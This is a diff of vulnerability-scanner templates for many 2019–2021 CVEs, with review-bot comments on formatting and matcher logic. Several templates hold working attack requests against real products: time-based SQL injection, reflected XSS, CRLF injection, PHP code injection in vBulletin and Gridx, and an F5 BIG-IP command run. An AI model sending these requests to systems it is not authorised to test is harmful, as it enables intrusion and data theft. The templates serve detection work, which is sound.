name: Webmin <= 1.920 Unauthenticated Remote Command Execution
|
||||
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
|
||||
author: bp0lr
|
||||
severity: critical
|
||||
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16313
|
||||
|
||||
info:
|
||||
name: ifw8 Router ROM v4.31 Credential Discovery
|
||||
name: ifw8 Router ROM v4.31 - Credential Discovery
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16662
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.2 Remote Code Execution
|
||||
name: rConfig 3.9.2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
|
||||
|
|
|
@ -15,7 +15,10 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-16759
|
||||
cwe-id: CWE-94
|
||||
tags: rce,kev,seclists,cve,cve2019,vbulletin
|
||||
metadata:
|
||||
shodan-query: http.component:"vBulletin"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,rce,kev,seclists,vbulletin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,15 +27,15 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "addcc9f9f2f40e2e6aca3079b73d9d17"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Version"
|
||||
|
||||
# Enhanced by mp on 2022/03/29
|
||||
|
|
|
@ -12,9 +12,10 @@ info:
|
|||
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-2729
|
||||
cwe-id: CWE-284
|
||||
tags: cve,cve2019,oracle,rce,weblogic
|
||||
|
||||
requests:
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.tenable.com/security/research/tra-2019-03
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3911
|
||||
cwe-id: CWE-79
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://www.cvedetails.com/cve/CVE-2019-3912
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3912
|
||||
cwe-id: CWE-601
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-6802
|
||||
|
||||
info:
|
||||
name: Pypiserver 1.2.5 - CRLF Injection
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
|
||||
reference:
|
||||
- https://vuldb.com/?id.130257
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
|
||||
- https://github.com/pypiserver/pypiserver/issues/237
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-6802
|
||||
cwe-id: CWE-79,CWE-74
|
||||
metadata:
|
||||
shodan-query: html:"pypiserver"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,crlf,generic,pypiserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'Set-Cookie: crlfinjection=1;'
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10546
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10547
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
|
||||
|
|
|
@ -7,9 +7,10 @@ info:
|
|||
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
|
||||
reference:
|
||||
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
|
||||
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
|
||||
- https://github.com/grafana/grafana/pull/23254
|
||||
- https://security.netapp.com/advisory/ntap-20200810-0002/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110
|
||||
- https://hackerone.com/reports/1329433
|
||||
remediation: This issue can be resolved by updating Grafana to the latest version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-11991
|
||||
|
||||
info:
|
||||
name: Apache Cocoon 2.1.12 XML Injection
|
||||
name: Apache Cocoon 2.1.12 - XML Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2020-13121
|
||||
|
||||
info:
|
||||
name: Submitty 20.04.01 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
|
||||
reference:
|
||||
- https://github.com/Submitty/Submitty/issues/5265
|
||||
- https://www.cvedetails.com/cve/CVE-2020-13121
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-13121
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,submitty,oos
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}/authentication/login
|
||||
|
||||
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
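Review bot: The payload and the matcher disagree on the redirect host: L2210 sends `old=http%253A%252F%252Fexample.com%252Fhome` (double-encoded `http://example.com/home`), but the regex on L2247 only accepts a `Location` header pointing at `interact.sh`, so the template cannot match a vulnerable Submitty instance. Point them at the same host, e.g. `POST /authentication/check_login?old=http%253A%252F%252Finteract.sh%252Fhome HTTP/1.1`. The body on L2227 also references `{{username}}` and `{{password}}` that the template never defines; nuclei skips a request with unresolved variables unless they are supplied with `-var`, and since the description says an invalid login attempt is enough, a `variables:` block with placeholder values (or literal dummy credentials) would let the template run standalone — confirm the unresolved-variable behaviour for the nuclei version this repo targets. Minor: `cvss-score: 6.10` on L2187 is an unquoted float and will be read as `6.1`; write `6.1`.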
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-13937
|
||||
|
||||
info:
|
||||
name: Apache Kylin Exposed Configuration File
|
||||
name: Apache Kylin - Exposed Configuration File
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,cockpit,agentejo,xss,oss
|
||||
tags: cve,cve2020,cockpit,agentejo,xss,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -7,9 +7,9 @@ info:
description: |
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
reference:
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
- https://github.com/oria/gridx/issues/433
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -19,23 +19,18 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
|
||||
matchers-condition: and
matchers:
|
||||
- type: word
part: body
words:
- "6ca86c2c17047c14437f55c42c801c10"
|
||||
- type: status
status:
- 200
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
|
||||
# Enhanced by mp on 2022/04/27
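Review bot: The new word matcher pins the bare hex literal `6ca86c2c17047c14437f55c42c801c10` with nothing in the template tying it to the string the request asks the target to hash, so a later edit to either side silently breaks detection and a reader cannot check the constant. The `md5()` helper is already used on this page (`{{md5(num)}}` in the WPCargo template), so a `type: dsl` matcher with `- 'contains(body, md5("CVE-2020-19625"))'` would derive the expectation from the same input; failing that, a comment `# md5("CVE-2020-19625")` above the literal documents where it comes from. The `matchers-condition: and` paired with the status check is fine as written.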
@ -0,0 +1,39 @@
id: CVE-2020-21012
|
||||
info:
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-21012
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,hotel,sqli,unauth
|
||||
requests:
- raw:
- |
POST /forgot_password.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
|
||||
btn_forgot=1&email=1%27%20or%20sleep(6)%23
|
||||
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and
|
||||
# Enhanced by md on 2022/12/08
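Review bot: The raw request block carries no `@timeout:` line even though the dsl check `duration>=6` needs the response to be held for at least six seconds; the other sleep-based templates in this merge set one (`@timeout: 20s` for PrestaShop, `@timeout: 15s` for Asgaros Forum), and without it the scanner's default per-request timeout decides whether a vulnerable host is reported at all. Add `@timeout: 15s` as the first line of the raw block. The CVE-2020-29284 template below has the same gap. Separately, `verified: "true"` is a quoted string here and in most of the new templates while the Cockpit and Give entries on this page use the bare boolean `true`; one form should be used across `metadata`.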
@ -0,0 +1,48 @@
id: CVE-2020-24902
|
||||
info:
name: Quixplorer <=2.4.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24902
cwe-id: CWE-79
metadata:
google-dork: intitle:"My Download Server"
shodan-query: http.title:"My Download Server"
verified: "true"
tags: cve,cve2020,quixplorer,xss
|
||||
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>&srt=yes"
- "My Download"
condition: and
|
||||
- type: word
part: header
words:
- text/html
|
||||
- type: status
status:
- 200
|
||||
# Enhanced by md on 2022/12/08
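Review bot: The metadata key is spelled `google-dork` here but `google-query` in the IND780 template added by this same merge, so anything that indexes template metadata sees two different fields for the same thing; pick one spelling and apply it to both. The body matcher also requires `&srt=yes` to follow the reflected script, which presumably is how Quixplorer echoes the query back; a short comment such as `# the application appends &srt=yes to the reflected value` would stop the next maintainer from trimming it and silently losing the match.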
@ -0,0 +1,45 @@
id: CVE-2020-24903
|
||||
info:
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://seclists.org/bugtraq/2016/Mar/104
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24903
cwe-id: CWE-79
metadata:
shodan-query: http.component:"ASP.NET"
verified: "true"
tags: cve,cve2020,cuteeditor,xss,seclists
|
||||
requests:
- method: GET
path:
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
|
||||
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script></p>"
- "System.Web"
condition: and
|
||||
- type: word
part: header
words:
- text/html
|
||||
- type: status
status:
- 200
|
||||
# Enhanced by md on 2022/12/08
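Review bot: The `path:` entry embeds `"`, `>`, `<` and `;` raw inside the single-quoted scalar, whereas the Quixplorer template in this merge percent-encodes its query; how those bytes go on the wire is left to the scanner's URL handling, and the body match `<script>alert(document.domain)</script></p>` only holds if they arrive unchanged. Encoding the query the same way as the sibling template makes the request deterministic across scanner versions. `verified: "true"` is again a quoted string rather than a boolean.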
@ -4,7 +4,7 @@ id: CVE-2020-25213
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
|
||||
info:
name: WordPress File Manager Plugin Remote Code Execution
name: WordPress File Manager Plugin - Remote Code Execution
author: foulenzer
severity: critical
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
@ -1,7 +1,7 @@
id: CVE-2020-25223
|
||||
info:
name: Sophos UTM Preauth Remote Code Execution
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
@ -1,7 +1,7 @@
id: CVE-2020-25506
|
||||
info:
name: D-Link DNS-320 Unauthenticated Remote Code Execution
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
@ -1,7 +1,7 @@
id: CVE-2020-2551
|
||||
info:
name: Oracle WebLogic Server Remote Code Execution
name: Oracle WebLogic Server - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
@ -0,0 +1,40 @@
id: CVE-2020-26248
|
||||
info:
name: PrestaShop Product Comments <4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://packagist.org/packages/prestashop/productcomments
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
remediation: Fixed in 4.2.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,sqli,prestshop,packetstorm
|
||||
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
|
||||
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
|
||||
# Enhanced by md on 2022/12/08
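Review bot: `name` says `PrestaShop Product Comments <4.2.0` while `description` and `remediation` both place the fix in 4.2.1, so 4.2.0 is excluded by the title but covered by the text; `name: PrestaShop Product Comments <4.2.1 - SQL Injection` agrees with the remediation line. The tag `prestshop` is misspelled, and the same misspelling appears in the CVE-2021-3110 template below, so `-tags prestashop` selects neither. The comma splice in the description (`vulnerability, An attacker`) should be a full stop.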
@ -0,0 +1,45 @@
id: CVE-2020-29284
|
||||
info:
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
reference:
- https://www.exploit-db.com/exploits/48984
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29284
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2020,tablereservation,sqli,unauth,edb,cve
|
||||
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
|
||||
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
|
||||
- type: word
part: body
words:
- "Restaurent Tables"
- "Chair List"
condition: and
|
||||
- type: status
status:
- 200
|
||||
# Enhanced by md on 2022/12/08
@ -1,7 +1,7 @@
id: CVE-2020-35846
|
||||
info:
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
@ -1,7 +1,7 @@
id: CVE-2020-35847
|
||||
info:
name: Agentejo Cockpit <0.11.2 NoSQL Injection
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
@ -1,7 +1,7 @@
id: CVE-2021-20114
|
||||
info:
name: TCExam <= 14.8.1 Sensitive Information Exposure
name: TCExam <= 14.8.1 - Sensitive Information Exposure
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
@ -0,0 +1,54 @@
id: CVE-2021-20323
|
||||
info:
name: Keycloak < 18.0.0 - Cross Site Scripting
author: ndmalc
severity: medium
description: |
Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
reference:
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
- https://access.redhat.com/security/cve/CVE-2021-20323
- https://github.com/ndmalc/CVE-2021-20323
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-20323
cwe-id: CWE-79
metadata:
shodan-query: html:"Keycloak"
verified: "true"
tags: cve,cve2021,keycloak,xss
|
||||
requests:
- method: POST
path:
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
- "{{BaseURL}}/realms/master/clients-registrations/default"
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
|
||||
headers:
Content-Type: application/json
|
||||
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
|
||||
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
|
||||
- type: word
part: header
words:
- text/html
|
||||
- type: status
status:
- 400
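Review bot: The description has the typo `text/hml` for the content type the finding depends on, and `name` uses `Cross Site Scripting` where every other XSS template in this merge writes `Cross-Site Scripting`; both are file text, so fix them in the template. The matcher set (reflection in body, `text/html` header, status 400 under `matchers-condition: and`) is tight, and `stop-at-first-match: true` keeps the four realm paths from producing duplicate findings.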
@ -1,19 +1,18 @@
id: CVE-2021-22986
|
||||
info:
name: F5 BIG-IP iControl REST - Remote Command Execution
name: F5 BIG-IP iControl REST unauthenticated RCE
author: rootxharsh,iamnoooob
severity: critical
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
reference:
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
- https://support.f5.com/csp/article/K03009991
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986
- http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-22986
tags: bigip,cve,cve2021,rce,mirai,kev
tags: bigip,cve,cve2021,rce,kev,packetstorm
|
||||
requests:
- raw:
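Review bot: If the second line of each printed pair is the new side, this hunk renames the template to `F5 BIG-IP iControl REST unauthenticated RCE` and rewrites the description to `The iControl REST interface has …`, dropping the vendor and product name and the `Product - Impact` form that the rest of this merge applies (`Sophos UTM Preauth - Remote Code Execution`, `Oracle WebLogic Server - Remote Code Execution`). Keep `name: F5 BIG-IP iControl REST - Remote Command Execution` and a description that names F5 BIG-IP. The request block of this template starts after this hunk.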
@ -24,6 +23,7 @@ requests:
Authorization: Basic YWRtaW46
Content-Type: application/json
Cookie: BIGIPAuthCookie=1234
Connection: close
|
||||
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
- |
@ -32,6 +32,7 @@ requests:
Accept-Language: en
X-F5-Auth-Token: {{token}}
Content-Type: application/json
Connection: close
|
||||
{"command":"run","utilCmdArgs":"-c id"}
|
||||
@ -43,7 +44,6 @@ requests:
group: 1
regex:
- "([A-Z0-9]{26})"
|
||||
- type: regex
part: body
group: 1
@ -56,5 +56,3 @@ requests:
- "commandResult"
- "uid="
condition: and
|
||||
# Enhanced by mp on 2022/05/05
@ -0,0 +1,37 @@
id: CVE-2021-24827
|
||||
info:
name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
reference:
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
- https://wordpress.org/plugins/asgaros-forum/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24827
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
|
||||
requests:
- raw:
- |
@timeout: 15s
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
Host: {{Hostname}}
|
||||
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "asgarosforum")'
condition: and
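Review bot: `tags` carries `cve2022` for `id: CVE-2021-24827`, the same mismatch this merge corrects in the Cockpit and TermTalk templates; a run with `-tags cve2021` skips this template and `-tags cve2022` wrongly pulls it in. Change it to `cve2021`. The `@timeout: 15s` line is the right companion to the `duration>=6` check.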
@ -18,7 +18,7 @@ info:
tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan
|
||||
requests:
- method:
- method: GET
path:
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="
|
||||
@ -0,0 +1,51 @@
id: CVE-2021-25003
|
||||
info:
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
reference:
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
- https://wordpress.org/plugins/wpcargo/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434
metadata:
verified: "true"
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
|
||||
variables:
num: "999999999"
|
||||
requests:
- raw:
- |
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
|
||||
